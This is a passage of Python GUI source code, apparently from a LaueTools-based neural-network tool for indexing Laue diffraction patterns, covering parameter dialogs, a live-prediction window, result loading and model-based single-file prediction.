# create a dictionary and emit the signal
emit_dictionary = { "material_": self.dict_LT.currentText(), ## same key as used in LaueTools
"material1_": self.dict_LT1.currentText(),
"prefix": self.prefix.text(),
"symmetry": self.symmetry.currentText(),
"symmetry1": self.symmetry1.currentText(),
"hkl_max_identify" : self.hkl_max.text(), # can be "auto" or an index i.e 12
"hkl_max_identify1" : self.hkl_max1.text(), # can be "auto" or an index i.e 12
"maximum_angle_to_search" : float(self.maximum_angle_to_search.text()),
"step_for_binning" : float(self.step_for_binning.text()),
"mode_of_analysis" : int(self.mode_of_analysis.currentText()),
"nb_grains_per_lp" : int(self.nb_grains_per_lp.text()), ## max grains to expect in a LP
"nb_grains_per_lp1" : int(self.nb_grains_per_lp1.text()),
"grains_nb_simulate" : int(self.grains_nb_simulate.text()),
"detectorparameters" : detector_params,
"pixelsize" : float(self.pixelsize.text()),
"dim1":float(self.detectordim.text().split(",")[0]),
"dim2":float(self.detectordim.text().split(",")[1]),
"emin":float(self.minmaxE.text().split(",")[0]),
"emax" : float(self.minmaxE.text().split(",")[1]),
"batch_size": int(self.batch_size.text()), ## batches of files to use while training
"epochs": int(self.epochs.text()), ## number of epochs for training
"texture": self.texture_model.currentText(),
"mode_nn": self.mode_nn.currentText(),
"grid_bool": self.grid_search_hyperparams.currentText(),
"directory": self.modelDirecSave,
"freq_rmv": int(self.freq_rmv.text()),
"freq_rmv1": int(self.freq_rmv1.text()),
"elements": self.elements.text(),
"elements1": self.elements1.text(),
"include_scm": self.include_scm.currentText(),
"lr":float(self.learningrate_rc.text().split(",")[0]),
"kc" : float(self.learningrate_rc.text().split(",")[1]),
"bc":float(self.learningrate_rc.text().split(",")[0]),
}
self.got_signal.emit(emit_dictionary)
self.close() # close the window
class AnotherWindowLivePrediction(QWidget):#QWidget QScrollArea
def __init__(self, state=0, gui_state=0, material_=None, material1_=None, emin=None, emax=None,
symmetry=None, symmetry1=None, detectorparameters=None, pixelsize=None, lattice_=None,
lattice1_=None, hkl_all_class0=None, hkl_all_class1=None, mode_spotCycleglobal=None,
softmax_threshold_global = None, mr_threshold_global = None, cap_matchrate = None,
coeff = None, coeff_overlap1212 = None, fit_peaks_gaussian_global = None,
FitPixelDev_global = None, NumberMaxofFits = None, tolerance_strain = None, tolerance_strain1 = None,
material0_limit = None, material1_limit=None, symmetry_name=None, symmetry1_name=None,
use_previous_UBmatrix_name = None, material_phase_always_present=None, crystal=None, crystal1=None,
strain_free_parameters=None, additional_expression=None):
super(AnotherWindowLivePrediction, self).__init__()
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
self.myQMenuBar = QMenuBar(self)
self._createMenu()
self.material_phase_always_present = material_phase_always_present
self.symmetry_name = symmetry_name
self.symmetry1_name = symmetry1_name
self.material0_limit = material0_limit
self.material1_limit = material1_limit
self.softmax_threshold_global = softmax_threshold_global
self.mr_threshold_global = mr_threshold_global
self.cap_matchrate = cap_matchrate
self.coeff = coeff
self.coeff_overlap = coeff_overlap1212
self.fit_peaks_gaussian_global = fit_peaks_gaussian_global
self.FitPixelDev_global = FitPixelDev_global
self.NumberMaxofFits = NumberMaxofFits
self.tolerance_strain = tolerance_strain
self.tolerance_strain1 = tolerance_strain1
self.mode_spotCycle = mode_spotCycleglobal
self.material_ = material_
self.material1_ = material1_
self.files_treated = []
self.cnt = 0
self.emin = emin
self.emax= emax
self.lattice_ = lattice_
self.lattice1_ = lattice1_
self.symmetry = symmetry
self.symmetry1 = symmetry1
self.crystal = crystal
self.crystal1 = crystal1
self.hkl_all_class0 = hkl_all_class0
self.hkl_all_class1 = hkl_all_class1
self.col = np.zeros((10,3))
self.colx = np.zeros((10,3))
self.coly = np.zeros((10,3))
self.match_rate = np.zeros((10,1))
self.spots_len = np.zeros((10,1))
self.iR_pix = np.zeros((10,1))
self.fR_pix = np.zeros((10,1))
self.mat_global = np.zeros((10,1))
self.rotation_matrix = np.zeros((10,3,3))
self.strain_matrix = np.zeros((10,3,3))
self.strain_matrixs = np.zeros((10,3,3))
self.strain_calculation = False
self.use_previous_UBmatrix_name = use_previous_UBmatrix_name
self.strain_free_parameters = strain_free_parameters
self.additional_expression = additional_expression
self.detectorparameters = detectorparameters
self.pixelsize= pixelsize
if expfile_global != None:
self.filenameDirec = expfile_global
else:
self.filenameDirec = None
self.experimental = QPushButton('Browse')
self.experimental.clicked.connect(self.getfiles1)
self.ipf_axis = QComboBox()
choices = ["Z","Y","X"]
for s in choices:
self.ipf_axis.addItem(s)
self.filenamebkg = None
self.filename_bkg = QPushButton('Browse')
self.filename_bkg.clicked.connect(self.getfilebkg_file)
self.blacklist_file = None
self.filename_blst = QPushButton('Browse')
self.filename_blst.clicked.connect(self.getfileblst_file)
self.tolerance = QLineEdit()
self.tolerance.setText("0.5")
self.tolerance1 = QLineEdit()
self.tolerance1.setText("0.5")
self.image_grid = QLineEdit()
self.image_grid.setText("10,10")
self.ubmat = QLineEdit()
self.ubmat.setText("1")
self.bkg_treatment = QLineEdit()
self.bkg_treatment.setText("A-B")
if modelfile_global != None:
self.modelDirec = modelfile_global
else:
self.modelDirec = None
self.model_direc = QPushButton('Browse')
self.model_direc.clicked.connect(self.getfiles)
if weightfile_global != None:
self.filenameModel = [weightfile_global]
else:
self.filenameModel = None
self.model_path = QPushButton('Browse')
self.model_path.clicked.connect(self.getfileModel)
self.ccd_label = QComboBox()
self.ccd_label.addItem("Cor")
choices = dictLT.dict_CCD.keys()
for s in choices:
self.ccd_label.addItem(s)
self.intensity_threshold = QLineEdit()
self.intensity_threshold.setText("1500")
self.experimental_prefix = QLineEdit()
self.experimental_prefix.setText("")
self.boxsize = QLineEdit()
self.boxsize.setText("5")
self.hkl_plot = QLineEdit()
self.hkl_plot.setText("[1,1,0],[1,1,1],[1,0,0]")
self.matrix_plot = QComboBox()
choices = ["1"]
for s in choices:
self.matrix_plot.addItem(s)
self.strain_plot = QComboBox()
choices = ["11_sample","22_sample","33_sample","12_sample","13_sample","23_sample",\
"11_crystal","22_crystal","33_crystal","12_crystal","13_crystal","23_crystal"]
for s in choices:
self.strain_plot.addItem(s)
self.matrix_plot_tech = QComboBox()
choices = ["Sequential", "MultiProcessing"]
for s in choices:
self.matrix_plot_tech.addItem(s)
self.analysis_plot_tech = QComboBox()
choices = ["slow", "graphmode", "update_reupdate", "houghmode"]#, "houghgraphmode"]
for s in choices:
self.analysis_plot_tech.addItem(s)
self.strain_plot_tech = QComboBox()
choices = ["NO", "YES"]
for s in choices:
self.strain_plot_tech.addItem(s)
### default values here
if tolerance_global != None:
self.tolerance.setText(str(tolerance_global))
if tolerance_global1 != None:
self.tolerance1.setText(str(tolerance_global1))
if image_grid_globalx != None:
self.image_grid.setText(str(image_grid_globalx)+","+str(image_grid_globaly))
if exp_prefix_global != None:
self.experimental_prefix.setText(exp_prefix_global)
if ccd_label_global != None:
self.ccd_label.setCurrentText(ccd_label_global)
if intensity_threshold_global != None:
self.intensity_threshold.setText(str(intensity_threshold_global))
if boxsize_global != None:
self.boxsize.setText(str(boxsize_global))
if UB_matrix_global != None:
self.ubmat.setText(str(UB_matrix_global))
if strain_label_global != None:
self.strain_plot_tech.setCurrentText(strain_label_global)
if mode_spotCycle != None:
self.analysis_plot_tech.setCurrentText(mode_spotCycle)
if hkls_list_global != None:
self.hkl_plot.setText(hkls_list_global)
# button to continue training
self.btn_config = QPushButton('Predict and Plot')
self.btn_config.clicked.connect(self.plot_pc)
self.btn_stop = QPushButton("Stop")
self.btn_stop.clicked.connect(self.plot_btn_stop)
self.btn_save = QPushButton("Save data and plots")
self.btn_save.clicked.connect(self.save_btn)
self.btn_load = QPushButton("Prediction single file")
self.btn_load.clicked.connect(self.predict_single_file)
self.btn_loadall = QPushButton("optimize parameters")
self.btn_loadall.clicked.connect(self.optimize_parameters)
self.refresh_replot_button = QPushButton("Refresh/ Replot")
self.refresh_replot_button.clicked.connect(self.refreshplots)
self.btn_stop.setEnabled(False)
self.btn_save.setEnabled(False)
mat_bool = False
if self.material_ == self.material1_:
mat_bool = True
self.layout = QVBoxLayout() # QGridLayout()
self.canvas = MplCanvas(self, width=10, height=10, dpi=100, mat_bool=mat_bool)
self.toolbar = NavigationToolbar(self.canvas, self)
self.canvas.mpl_connect('button_press_event', self.onclickImage)
self.canvas.mpl_connect('key_press_event', toggle_selector)
self.canvas.mpl_connect('key_press_event', toggle_selector1)
# set the layout
self.layout.addWidget(self.toolbar, 0)
self.layout.addWidget(self.canvas, 100)
formLayout = QFormLayout()
formLayout.addRow('Image XY grid size',self.image_grid)
formLayout.addRow('IPF axis (Cubic and HCP system)', self.ipf_axis)
formLayout.addRow('Matricies to predict (sequential)', self.ubmat)
formLayout.addRow('Matrix to plot', self.matrix_plot)
formLayout.addRow('Strain component to plot', self.strain_plot)
formLayout.addRow('CPU mode', self.matrix_plot_tech)
formLayout.addRow('Analysis mode', self.analysis_plot_tech)
formLayout.addRow(self.btn_stop, self.btn_config)
formLayout.addRow(self.btn_load, self.btn_save)
# formLayout.addRow('Verify parameters of peak/prediction module', self.btn_loadall)
formLayout.addRow(self.refresh_replot_button, self.btn_loadall)
self.layout.addLayout(formLayout)
self.setLayout(self.layout)
self.file_state=0
self.timermp1212 = QtCore.QTimer()
self.popups = []
self.old_UB_len = 1
self.initialize_params()
self.initialize_plot()
def _createMenu(self):
self.menu = self.myQMenuBar.addMenu("&Menu")
self.menu.addAction('&Load results', self.getresults)
self.menu.addAction('&Refresh plots', self.refreshplots)
def getresults(self,):
self.btn_save.setEnabled(True)
filenameResults = QFileDialog.getOpenFileName(self, 'Select the results pickle file')
try:
self.load_results(filenameResults[0])
except:
print("No file selected")
def refreshplots(self):
## update matrix plot box?
if self.matrix_plot.count() < int(self.ubmat.text()):
for intmat in range(int(self.ubmat.text())):
if intmat == 0 or intmat < self.matrix_plot.count():
continue
self.matrix_plot.addItem(str(intmat+1))
self.modify_array()
self.initialize_plot()
def load_results(self, filename):
try:
with open(filename, "rb") as input_file:
self.best_match, \
self.mat_global, self.rotation_matrix, self.strain_matrix, self.strain_matrixs,\
self.col, self.colx, self.coly, self.match_rate, self.files_treated,\
self.lim_x, self.lim_y, self.spots_len, self.iR_pix, self.fR_pix, self.material_, \
self.material1_, self.lattice, self.lattice1, self.symmetry, self.symmetry1,\
self.crystal, self.crystal1 = cPickle.load(input_file)
except:
try:
with open(filename, "rb") as input_file:
self.best_match, \
self.mat_global, self.rotation_matrix, self.strain_matrix, self.strain_matrixs,\
self.col, self.colx, self.coly, self.match_rate, self.files_treated,\
self.lim_x, self.lim_y, self.spots_len, self.iR_pix, self.fR_pix, self.material_, \
self.material1_, self.lattice, self.lattice1, \
self.symmetry, self.symmetry1 = cPickle.load(input_file)
except:
with open(filename, "rb") as input_file:
self.mat_global, self.rotation_matrix, self.strain_matrix, self.strain_matrixs,\
self.col, self.colx, self.coly, self.match_rate, self.files_treated,\
self.lim_x, self.lim_y = cPickle.load(input_file)
self.ubmat.setText(str(len(self.rotation_matrix)))
## update matrix plot box?
if self.matrix_plot.count() < int(self.ubmat.text()):
for intmat in range(len(self.rotation_matrix)):
if intmat == 0:
continue
self.matrix_plot.addItem(str(intmat+1))
cond = self.strain_plot_tech.currentText()
self.strain_calculation = False
if cond == "YES":
self.strain_calculation = True
## Number of files to generate
grid_files = np.zeros((self.lim_x,self.lim_y))
self.filenm = np.chararray((self.lim_x,self.lim_y), itemsize=1000)
grid_files = grid_files.ravel()
self.filenm = self.filenm.ravel()
count_global = self.lim_x * self.lim_y
if self.ccd_label.currentText() == "Cor" or self.ccd_label.currentText() == "cor":
format_file = "cor"
else:
format_file = dictLT.dict_CCD[self.ccd_label.currentText()][7]
list_of_files = glob.glob(self.filenameDirec+'//'+self.experimental_prefix.text()+'*.'+format_file)
## sort files
## TypeError: '<' not supported between instances of 'str' and 'int'
list_of_files.sort(key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
if len(list_of_files) == count_global:
for ii in range(len(list_of_files)):
grid_files[ii] = ii
self.filenm[ii] = list_of_files[ii]
else:
print("expected "+str(count_global)+" files based on the XY grid ("+str(self.lim_x)+","+str(self.lim_y)+") defined by user")
print("But found "+str(len(list_of_files))+" files (either all data is not written yet or maybe XY grid definition is not proper)")
digits = len(str(count_global))
digits = max(digits,4)
for ii in range(count_global):
text = str(ii)
string = text.zfill(digits)
file_name_temp = self.filenameDirec+'//'+self.experimental_prefix.text()+string+'.'+format_file
## store it in a grid
self.filenm[ii] = file_name_temp
### Create a COR directory to be loaded in LaueTools
self.cor_file_directory = self.filenameDirec + "//" + self.experimental_prefix.text()+"CORfiles"
if format_file in ['cor',"COR","Cor"]:
self.cor_file_directory = self.filenameDirec
if not os.path.exists(self.cor_file_directory):
os.makedirs(self.cor_file_directory)
self.initialize_plot()
def closeEvent(self, event):
self.close
super().closeEvent(event)
def getfilebkg_file(self):
self.filenamebkg = QFileDialog.getOpenFileName(self, 'Select the background image of same detector')
def getfileblst_file(self):
self.blacklist_file = QFileDialog.getOpenFileName(self, 'Select the list of peaks DAT file to blacklist')
def initialize_params(self):
self.model_direc = self.modelDirec
self.lim_x, self.lim_y = int(self.image_grid.text().split(",")[0]), int(self.image_grid.text().split(",")[1])
if self.cnt == 0:
self.col = [[] for i in range(int(self.ubmat.text()))]
self.colx = [[] for i in range(int(self.ubmat.text()))]
self.coly = [[] for i in range(int(self.ubmat.text()))]
self.rotation_matrix = [[] for i in range(int(self.ubmat.text()))]
self.strain_matrix = [[] for i in range(int(self.ubmat.text()))]
self.strain_matrixs = [[] for i in range(int(self.ubmat.text()))]
self.match_rate = [[] for i in range(int(self.ubmat.text()))]
self.spots_len = [[] for i in range(int(self.ubmat.text()))]
self.iR_pix = [[] for i in range(int(self.ubmat.text()))]
self.fR_pix = [[] for i in range(int(self.ubmat.text()))]
self.mat_global = [[] for i in range(int(self.ubmat.text()))]
self.best_match = [[] for i in range(int(self.ubmat.text()))]
self.spots1_global = [[] for i in range(int(self.ubmat.text()))]
for i in range(int(self.ubmat.text())):
self.col[i].append(np.zeros((self.lim_x*self.lim_y,3)))
self.colx[i].append(np.zeros((self.lim_x*self.lim_y,3)))
self.coly[i].append(np.zeros((self.lim_x*self.lim_y,3)))
self.rotation_matrix[i].append(np.zeros((self.lim_x*self.lim_y,3,3)))
self.strain_matrix[i].append(np.zeros((self.lim_x*self.lim_y,3,3)))
self.strain_matrixs[i].append(np.zeros((self.lim_x*self.lim_y,3,3)))
self.match_rate[i].append(np.zeros((self.lim_x*self.lim_y,1)))
self.spots_len[i].append(np.zeros((self.lim_x*self.lim_y,1)))
self.iR_pix[i].append(np.zeros((self.lim_x*self.lim_y,1)))
self.fR_pix[i].append(np.zeros((self.lim_x*self.lim_y,1)))
self.mat_global[i].append(np.zeros((self.lim_x*self.lim_y,1)))
self.best_match[i].append([[] for jk in range(self.lim_x*self.lim_y)])
self.spots1_global[i].append([[] for jk in range(self.lim_x*self.lim_y)])
count_global = self.lim_x * self.lim_y
self.check = np.zeros((count_global,int(self.ubmat.text())))
self.old_UB_len = int(self.ubmat.text())
## load model related files and generate the model
if self.material_ != self.material1_:
json_file = open(self.model_direc+"//model_"+self.material_+"_"+self.material1_+".json", 'r')
else:
json_file = open(self.model_direc+"//model_"+self.material_+".json", 'r')
self.classhkl = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_0"]
self.angbins = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_1"]
if self.material_ != self.material1_:
self.ind_mat = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_5"]
self.ind_mat1 = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_6"]
else:
self.ind_mat = None
self.ind_mat1 = None
load_weights = self.filenameModel[0]
self.wb = read_hdf5(load_weights)
self.temp_key = list(self.wb.keys())
# # load json and create model
loaded_model_json = json_file.read()
json_file.close()
self.model = model_from_json(loaded_model_json)
print("Constructing model")
load_weights = self.filenameModel[0]
self.model.load_weights(load_weights)
print("Uploading weights to model")
print("All model files found and loaded")
self.mode_spotCycle = self.analysis_plot_tech.currentText()
if self.use_previous_UBmatrix_name:
np.savez_compressed(self.model_direc+'//rotation_matrix_indexed_1.npz', self.rotation_matrix, self.mat_global, self.match_rate, 0.0)
cond = self.strain_plot_tech.currentText()
self.strain_calculation = False
if cond == "YES":
self.strain_calculation = True
# =============================================================================
# ## Multi-processing routine
# =============================================================================
## Number of files to generate
grid_files = np.zeros((self.lim_x,self.lim_y))
self.filenm = np.chararray((self.lim_x,self.lim_y), itemsize=1000)
grid_files = grid_files.ravel()
self.filenm = self.filenm.ravel()
if self.ccd_label.currentText() == "Cor" or self.ccd_label.currentText() == "cor":
format_file = "cor"
else:
format_file = dictLT.dict_CCD[self.ccd_label.currentText()][7]
list_of_files = glob.glob(self.filenameDirec+'//'+self.experimental_prefix.text()+'*.'+format_file)
## sort files
## TypeError: '<' not supported between instances of 'str' and 'int'
list_of_files.sort(key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
if len(list_of_files) == count_global:
for ii in range(len(list_of_files)):
grid_files[ii] = ii
self.filenm[ii] = list_of_files[ii]
else:
print("expected "+str(count_global)+" files based on the XY grid ("+str(self.lim_x)+","+str(self.lim_y)+") defined by user")
print("But found "+str(len(list_of_files))+" files (either all data is not written yet or maybe XY grid definition is not proper)")
digits = len(str(count_global))
digits = max(digits,4)
for ii in range(count_global):
text = str(ii)
if ii < 10000:
string = text.zfill(4)
else:
string = text.zfill(5)
file_name_temp = self.filenameDirec+'//'+self.experimental_prefix.text()+string+'.'+format_file
## store it in a grid
self.filenm[ii] = file_name_temp
## access grid files to process with multi-thread
self.ncpu = cpu_count_user
self.cor_file_directory = self.filenameDirec + "//" + self.experimental_prefix.text()+"CORfiles"
if format_file in ['cor',"COR","Cor"]:
self.cor_file_directory = self.filenameDirec
if not os.path.exists(self.cor_file_directory):
os.makedirs(self.cor_file_directory)
def modify_array(self):
if self.old_UB_len < int(self.ubmat.text()):
differen = abs(self.old_UB_len - int(self.ubmat.text()))
for iji in range(differen):
self.col.append([])
self.colx.append([])
self.coly.append([])
self.rotation_matrix.append([])
self.strain_matrix.append([])
self.strain_matrixs.append([])
self.match_rate.append([])
self.spots_len.append([])
self.iR_pix.append([])
self.fR_pix.append([])
self.mat_global.append([])
self.best_match.append([])
self.spots1_global.append([])
for iji in range(differen):
indd = int(self.old_UB_len + iji)
self.col[indd].append(np.zeros((self.lim_x*self.lim_y,3)))
self.colx[indd].append(np.zeros((self.lim_x*self.lim_y,3)))
self.coly[indd].append(np.zeros((self.lim_x*self.lim_y,3)))
self.rotation_matrix[indd].append(np.zeros((self.lim_x*self.lim_y,3,3)))
self.strain_matrix[indd].append(np.zeros((self.lim_x*self.lim_y,3,3)))
self.strain_matrixs[indd].append(np.zeros((self.lim_x*self.lim_y,3,3)))
self.match_rate[indd].append(np.zeros((self.lim_x*self.lim_y,1)))
self.spots_len[indd].append(np.zeros((self.lim_x*self.lim_y,1)))
self.iR_pix[indd].append(np.zeros((self.lim_x*self.lim_y,1)))
self.fR_pix[indd].append(np.zeros((self.lim_x*self.lim_y,1)))
self.mat_global[indd].append(np.zeros((self.lim_x*self.lim_y,1)))
self.best_match[indd].append([[] for jk in range(self.lim_x*self.lim_y)])
self.spots1_global[indd].append([[] for jk in range(self.lim_x*self.lim_y)])
self.check = np.c_[self.check, np.zeros(len(self.check))]
self.old_UB_len = int(self.ubmat.text())
def predict_single_file_nodialog(self, filenameSingleExp, intensity_threshold_global,
boxsize_global, FitPixelDev_global, softmax_threshold_global_123,
cap_matchrate_123, cnt,
nb_spots_consider_global123, residues_threshold123,
option_global123, nb_spots_global_threshold123, peakXY,
strain_free_parameters,additional_expression):
self.modify_array()
## update the main config ini file
config_setting = configparser.ConfigParser()
filepath = resource_path('settings.ini')
config_setting.read(filepath)
use_om_user = config_setting.get('CALLER', 'use_om_user')
path_user_OM = config_setting.get('CALLER', 'path_user_OM')
config_setting1 = configparser.ConfigParser()
print("Settings path is "+filepath)
config_setting1.read(filepath)
config_setting1.set('CALLER', 'residues_threshold',str(residues_threshold123))
config_setting1.set('CALLER', 'nb_spots_global_threshold',str(nb_spots_global_threshold123))
config_setting1.set('CALLER', 'option_global',str(option_global123))
config_setting1.set('CALLER', 'use_om_user',str(use_om_user))
config_setting1.set('CALLER', 'nb_spots_consider',str(nb_spots_consider_global123))
config_setting1.set('CALLER', 'path_user_OM',path_user_OM)
config_setting1.set('CALLER', 'intensity', str(intensity_threshold_global))
config_setting1.set('CALLER', 'boxsize', str(boxsize_global))
config_setting1.set('CALLER', 'pixdev', str(FitPixelDev_global))
config_setting1.set('CALLER', 'cap_softmax', str(softmax_threshold_global_123))
config_setting1.set('CALLER', 'cap_mr', str(cap_matchrate_123))
config_setting1.set('CALLER', 'strain_free_parameters', ",".join(strain_free_parameters))
config_setting1.set('CALLER', 'additional_expression', ",".join(additional_expression))
with open(filepath, 'w') as configfile:
config_setting1.write(configfile)
## Provide path to a single tiff or cor file to predict and write a pickle object
lim_x, lim_y = int(1), int(1)
cond = self.strain_plot_tech.currentText()
self.strain_calculation = False
if cond == "YES":
self.strain_calculation = True
## access grid files to process with multi-thread
check = np.zeros((1,int(self.ubmat.text())))
mode_analysis = self.analysis_plot_tech.currentText()
start_time = time.time()
col = [[] for i in range(int(self.ubmat.text()))]
colx = [[] for i in range(int(self.ubmat.text()))]
coly = [[] for i in range(int(self.ubmat.text()))]
rotation_matrix = [[] for i in range(int(self.ubmat.text()))]
strain_matrix = [[] for i in range(int(self.ubmat.text()))]
strain_matrixs = [[] for i in range(int(self.ubmat.text()))]
match_rate = [[] for i in range(int(self.ubmat.text()))]
spots_len = [[] for i in range(int(self.ubmat.text()))]
iR_pix = [[] for i in range(int(self.ubmat.text()))]
fR_pix = [[] for i in range(int(self.ubmat.text()))]
mat_global = [[] for i in range(int(self.ubmat.text()))]
best_match = [[] for i in range(int(self.ubmat.text()))]
for i in range(int(self.ubmat.text())):
col[i].append(np.zeros((lim_x*lim_y,3)))
colx[i].append(np.zeros((lim_x*lim_y,3)))
coly[i].append(np.zeros((lim_x*lim_y,3)))
rotation_matrix[i].append(np.zeros((lim_x*lim_y,3,3)))
strain_matrix[i].append(np.zeros((lim_x*lim_y,3,3)))
strain_matrixs[i].append(np.zeros((lim_x*lim_y,3,3)))
match_rate[i].append(np.zeros((lim_x*lim_y,1)))
spots_len[i].append(np.zeros((lim_x*lim_y,1)))
iR_pix[i].append(np.zeros((lim_x*lim_y,1)))
fR_pix[i].append(np.zeros((lim_x*lim_y,1)))
mat_global[i].append(np.zeros((lim_x*lim_y,1)))
best_match[i].append([[] for jk in range(lim_x*lim_y)])
##calculate neighbor_UB to be passed as variable directly
strain_matrix_mpdata, strain_matrixs_mpdata, \
rotation_matrix_mpdata, col_mpdata, \
colx_mpdata, coly_mpdata,\
match_rate_mpdata, mat_global_mpdata, cnt_mpdata,\
files_treated_mpdata, spots_len_mpdata, \
iR_pixel_mpdata, fR_pixel_mpdata, check_mpdata, \
best_match_mpdata, pred_hkl = predict_preprocessMP_vsingle(filenameSingleExp, 0,
rotation_matrix,strain_matrix,strain_matrixs,
col,colx,coly,match_rate,spots_len,iR_pix,fR_pix,best_match,
mat_global,
check,self.detectorparameters,self.pixelsize,self.angbins,
self.classhkl, self.hkl_all_class0, self.hkl_all_class1, self.emin, self.emax,
self.material_, self.material1_, self.symmetry, self.symmetry1,lim_x,lim_y,
self.strain_calculation, self.ind_mat, self.ind_mat1,
self.model_direc, float(self.tolerance.text()), float(self.tolerance1.text()),
int(self.ubmat.text()), self.ccd_label.currentText(),
self.filenameDirec, self.experimental_prefix.text(),
[],False,
self.wb, self.temp_key, self.cor_file_directory, mode_analysis,
softmax_threshold_global_123,
self.mr_threshold_global,
cap_matchrate_123,
self.tolerance_strain,
self.tolerance_strain1,
self.coeff,
self.coeff_overlap,
self.material0_limit,
self.material1_limit,
False,
self.material_phase_always_present,
self.crystal,
self.crystal1,peakXY,
strain_free_parameters)
end_time = time.time() - start_time
print("Total time to process one file in "+mode_analysis+" mode (in seconds): "+str(end_time))
try:
path = os.path.normpath(filenameSingleExp)
files = self.cor_file_directory+"//"+path.split(os.sep)[-1].split(".")[0]+".cor"
allres = IOLT.readfile_cor(files, True)
data_theta, data_chi, peakx, peaky, intensity = allres[1:6]
CCDcalib = allres[-1]
detectorparameters = allres[-2]
pixelsize = CCDcalib['pixelsize']
CCDLabel = CCDcalib['CCDLabel']
framedim = dictLT.dict_CCD[CCDLabel][0]
dict_dp={}
dict_dp['kf_direction']='Z>0'
dict_dp['detectorparameters']=detectorparameters
dict_dp['detectordistance']=detectorparameters[0]
dict_dp['detectordiameter']=pixelsize*framedim[0]#TODO*2
dict_dp['pixelsize']=pixelsize
dict_dp['dim']=framedim
dict_dp['peakX']=peakx
dict_dp['peakY']=peaky
dict_dp['intensity']=intensity
except:
print("No COR/ Exp. file could be found for the selected filename")
return
sim_twotheta1, sim_chi1, list_spots1, residues1, theo_index1 = [],[],[],[],[]
sim_energy1 = []
sim_hkl1 = []
for ijk in range(len(match_rate_mpdata)):
mat_global987 = mat_global_mpdata[ijk][0]
rotation_matrix987 = rotation_matrix_mpdata[ijk][0][0]
if mat_global987 == 1:
material_=self.material_
tolerance_add = float(self.tolerance.text())
elif mat_global987 == 2:
material_=self.material1_
tolerance_add = float(self.tolerance1.text())
else:
print("Matrix "+str(ijk+1)+" is not found")
material_ = None
tolerance_add = None
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
if np.all(rotation_matrix987==0):
material_ = None
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
print("No rotation matrix found")
if material_ != None:
sim_twotheta, sim_chi, sim_energy, sim_hkl,\
list_spots, residues, theo_index = simulate_spots(rotation_matrix987,
material_, self.emax, self.emin,
dict_dp['detectorparameters'], dict_dp,
tolerance_add, data_theta*2.0,
data_chi)
if len(sim_twotheta) == 0:
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
print("Nothing simulated")
sim_twotheta1.append(sim_twotheta)
sim_chi1.append(sim_chi)
list_spots1.append(list_spots)
residues1.append(residues)
theo_index1.append(theo_index)
sim_energy1.append(sim_energy)
sim_hkl1.append(sim_hkl)
w = MyPopup(match_rate_mpdata, rotation_matrix_mpdata, mat_global_mpdata, fR_pixel_mpdata, \
filenameSingleExp, strain_matrix_mpdata, strain_matrixs_mpdata, end_time, mode_analysis,
data_theta, data_chi, intensity, sim_twotheta1, sim_chi1, sim_energy1, sim_hkl1,
list_spots1, residues1, theo_index1, pred_hkl)
w.show()
self.popups.append(w)
#_ update the count to actual image number
cnt_mpdata = cnt
for i_mpdata in files_treated_mpdata:
self.files_treated.append(i_mpdata)
for intmat_mpdata in range(int(self.ubmat.text())):
self.check[cnt_mpdata,intmat_mpdata] = check_mpdata[0,intmat_mpdata]
self.mat_global[intmat_mpdata][0][cnt_mpdata] = mat_global_mpdata[intmat_mpdata][0][0]
self.strain_matrix[intmat_mpdata][0][cnt_mpdata,:,:] = strain_matrix_mpdata[intmat_mpdata][0][0,:,:]
self.strain_matrixs[intmat_mpdata][0][cnt_mpdata,:,:] = strain_matrixs_mpdata[intmat_mpdata][0][0,:,:]
self.rotation_matrix[intmat_mpdata][0][cnt_mpdata,:,:] = rotation_matrix_mpdata[intmat_mpdata][0][0,:,:]
self.col[intmat_mpdata][0][cnt_mpdata,:] = col_mpdata[intmat_mpdata][0][0,:]
self.colx[intmat_mpdata][0][cnt_mpdata,:] = colx_mpdata[intmat_mpdata][0][0,:]
self.coly[intmat_mpdata][0][cnt_mpdata,:] = coly_mpdata[intmat_mpdata][0][0,:]
self.match_rate[intmat_mpdata][0][cnt_mpdata] = match_rate_mpdata[intmat_mpdata][0][0]
self.spots_len[intmat_mpdata][0][cnt_mpdata] = spots_len_mpdata[intmat_mpdata][0][0]
self.iR_pix[intmat_mpdata][0][cnt_mpdata] = iR_pixel_mpdata[intmat_mpdata][0][0]
self.fR_pix[intmat_mpdata][0][cnt_mpdata] = fR_pixel_mpdata[intmat_mpdata][0][0]
self.best_match[intmat_mpdata][0][cnt_mpdata] = best_match_mpdata[intmat_mpdata][0][0]
self.update_plot()
def optimize_parameters(self,):
self.modify_array()
# Idea is to open the raster grid here and check the peak search and prediction hyperparameters
w = Window_allmap(self.lim_x, self.lim_y, self.filenm,
self.ccd_label.currentText(), self.predict_single_file_nodialog,
self.detectorparameters)
w.show()
self.popups.append(w)
def predict_single_file(self,):
## Provide path to a single tiff or cor file to predict and write a pickle object
filenameSingleExp = QFileDialog.getOpenFileName(self, 'Select a single experimental file',
resource_path("examples"))
if len(filenameSingleExp[0]) == 0:
return
filenameSingleExp = filenameSingleExp[0]
model_direc = self.modelDirec
lim_x, lim_y = int(1), int(1)
## load model related files and generate the model
if self.material_ != self.material1_:
json_file = open(model_direc+"//model_"+self.material_+"_"+self.material1_+".json", 'r')
else:
json_file = open(model_direc+"//model_"+self.material_+".json", 'r')
classhkl = np.load(model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_0"]
angbins = np.load(model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_1"]
if self.material_ != self.material1_:
ind_mat = np.load(model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_5"]
ind_mat1 = np.load(model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_6"]
else:
ind_mat = None
ind_mat1 = None
load_weights = self.filenameModel[0]
wb = read_hdf5(load_weights)
